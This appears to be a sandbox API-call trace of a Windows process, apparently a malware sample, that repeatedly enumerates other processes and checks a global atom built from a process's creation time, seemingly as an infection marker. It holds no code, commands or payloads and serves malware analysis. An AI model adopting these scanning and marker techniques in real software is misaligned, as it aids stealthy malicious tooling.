	[0109.712] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.712] CloseHandle (hObject=0x694) returned 1
	[0109.833] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0109.833] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0109.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0109.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0109.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0109.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0109.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0109.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0109.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0109.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0109.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0109.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0109.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0109.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0109.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0109.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0109.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0109.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0109.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0109.836] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.836] CloseHandle (hObject=0x694) returned 1
	[0109.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0109.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0109.837] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0109.837] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.837] CloseHandle (hObject=0x694) returned 1
	[0109.837] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0109.837] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0109.837] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.837] CloseHandle (hObject=0x694) returned 1
	[0109.837] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0109.837] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.837] CloseHandle (hObject=0x694) returned 1
	[0109.837] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0109.837] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.837] CloseHandle (hObject=0x694) returned 1
	[0109.837] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0109.838] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.838] CloseHandle (hObject=0x694) returned 1
	[0109.838] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0109.838] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.838] CloseHandle (hObject=0x694) returned 1
	[0109.838] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0109.838] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.838] CloseHandle (hObject=0x694) returned 1
	[0109.838] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0109.838] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0109.838] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.838] CloseHandle (hObject=0x694) returned 1
	[0109.839] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0109.839] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.839] CloseHandle (hObject=0x694) returned 1
	[0109.839] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0109.839] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.839] CloseHandle (hObject=0x694) returned 1
	[0109.839] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0109.839] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.839] CloseHandle (hObject=0x694) returned 1
	[0109.839] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0109.839] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.839] CloseHandle (hObject=0x694) returned 1
	[0109.839] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0109.839] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.840] CloseHandle (hObject=0x694) returned 1
	[0109.840] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0109.840] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.840] CloseHandle (hObject=0x694) returned 1
	[0109.840] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0109.840] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.840] CloseHandle (hObject=0x694) returned 1
	[0109.840] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0109.840] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.840] CloseHandle (hObject=0x694) returned 1
	[0109.840] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0109.840] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.840] CloseHandle (hObject=0x694) returned 1
	[0109.841] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0109.841] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.841] CloseHandle (hObject=0x694) returned 1
	[0109.841] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0109.841] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.841] CloseHandle (hObject=0x694) returned 1
	[0109.841] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0109.841] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.841] CloseHandle (hObject=0x694) returned 1
	[0109.841] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0109.841] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.841] CloseHandle (hObject=0x694) returned 1
	[0109.841] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0109.841] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.841] CloseHandle (hObject=0x694) returned 1
	[0109.842] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0109.842] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.842] CloseHandle (hObject=0x694) returned 1
	[0109.842] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0109.842] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.842] CloseHandle (hObject=0x694) returned 1
	[0109.842] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0109.842] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.842] CloseHandle (hObject=0x694) returned 1
	[0109.842] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0109.842] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.842] CloseHandle (hObject=0x694) returned 1
	[0109.842] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0109.842] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.842] CloseHandle (hObject=0x694) returned 1
	[0109.843] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0109.843] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.843] CloseHandle (hObject=0x694) returned 1
	[0109.843] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0109.843] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.843] CloseHandle (hObject=0x694) returned 1
	[0109.843] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0109.843] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.843] CloseHandle (hObject=0x694) returned 1
	[0109.843] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0109.844] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0109.844] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0109.844] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0109.844] wsprintfA (in: param_1=0x39937e0, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0109.844] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0109.845] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0109.845] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0109.845] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0109.845] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0109.845] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0109.937] CloseHandle (hObject=0x694) returned 1
	[0109.937] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0109.937] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0109.937] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.937] CloseHandle (hObject=0x694) returned 1
	[0109.937] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0109.937] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.937] CloseHandle (hObject=0x694) returned 1
	[0109.938] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0109.938] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.938] CloseHandle (hObject=0x694) returned 1
	[0109.986] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0109.986] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0109.986] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0109.986] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0109.987] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0109.987] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0109.987] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0109.987] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0109.987] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0109.987] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0109.987] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0109.988] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0109.988] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0109.988] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0109.988] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0109.988] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0109.988] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0109.988] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0109.988] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0109.989] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.989] CloseHandle (hObject=0x694) returned 1
	[0109.989] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0109.989] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0109.989] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0109.989] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.989] CloseHandle (hObject=0x694) returned 1
	[0109.989] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0109.990] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0109.990] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.990] CloseHandle (hObject=0x694) returned 1
	[0109.990] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0109.990] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.990] CloseHandle (hObject=0x694) returned 1
	[0109.990] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0109.990] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.990] CloseHandle (hObject=0x694) returned 1
	[0109.990] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0109.990] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.990] CloseHandle (hObject=0x694) returned 1
	[0109.990] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0109.990] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.990] CloseHandle (hObject=0x694) returned 1
	[0109.991] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0109.991] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.991] CloseHandle (hObject=0x694) returned 1
	[0109.991] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0109.991] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0109.991] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.991] CloseHandle (hObject=0x694) returned 1
	[0109.991] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0109.991] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.991] CloseHandle (hObject=0x694) returned 1
	[0109.997] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0109.997] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.997] CloseHandle (hObject=0x694) returned 1
	[0109.997] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0109.997] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.997] CloseHandle (hObject=0x694) returned 1
	[0109.997] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0109.997] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.997] CloseHandle (hObject=0x694) returned 1
	[0109.997] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0109.997] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.997] CloseHandle (hObject=0x694) returned 1
	[0109.998] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0109.998] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.998] CloseHandle (hObject=0x694) returned 1
	[0109.998] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0109.998] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.998] CloseHandle (hObject=0x694) returned 1
	[0109.998] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0109.998] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.998] CloseHandle (hObject=0x694) returned 1
	[0109.998] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0109.998] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.998] CloseHandle (hObject=0x694) returned 1
	[0109.998] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0109.998] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.998] CloseHandle (hObject=0x694) returned 1
	[0109.999] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0109.999] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.999] CloseHandle (hObject=0x694) returned 1
	[0109.999] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0109.999] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.999] CloseHandle (hObject=0x694) returned 1
	[0109.999] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0109.999] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.999] CloseHandle (hObject=0x694) returned 1
	[0109.999] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0109.999] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.999] CloseHandle (hObject=0x694) returned 1
	[0110.000] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0110.000] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.000] CloseHandle (hObject=0x694) returned 1
	[0110.000] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0110.000] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.000] CloseHandle (hObject=0x694) returned 1
	[0110.000] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0110.000] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.000] CloseHandle (hObject=0x694) returned 1
	[0110.000] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0110.000] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.000] CloseHandle (hObject=0x694) returned 1
	[0110.001] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0110.001] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.001] CloseHandle (hObject=0x694) returned 1
	[0110.001] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0110.001] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.001] CloseHandle (hObject=0x694) returned 1
	[0110.001] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0110.001] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.001] CloseHandle (hObject=0x694) returned 1
	[0110.001] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0110.001] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.001] CloseHandle (hObject=0x694) returned 1
	[0110.001] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0110.002] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0110.002] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0110.002] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0110.002] wsprintfA (in: param_1=0x3993c40, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0110.003] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0110.003] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0110.003] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0110.003] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0110.003] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0110.003] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0110.004] CloseHandle (hObject=0x694) returned 1
	[0110.004] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0110.004] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0110.004] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.004] CloseHandle (hObject=0x694) returned 1
	[0110.004] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0110.004] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.004] CloseHandle (hObject=0x694) returned 1
	[0110.004] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0110.004] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.004] CloseHandle (hObject=0x694) returned 1
	[0110.131] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0110.131] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0110.131] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0110.131] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0110.131] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0110.132] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0110.132] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0110.132] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0110.132] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0110.132] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0110.132] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0110.133] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0110.133] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0110.133] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0110.133] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0110.133] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0110.133] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
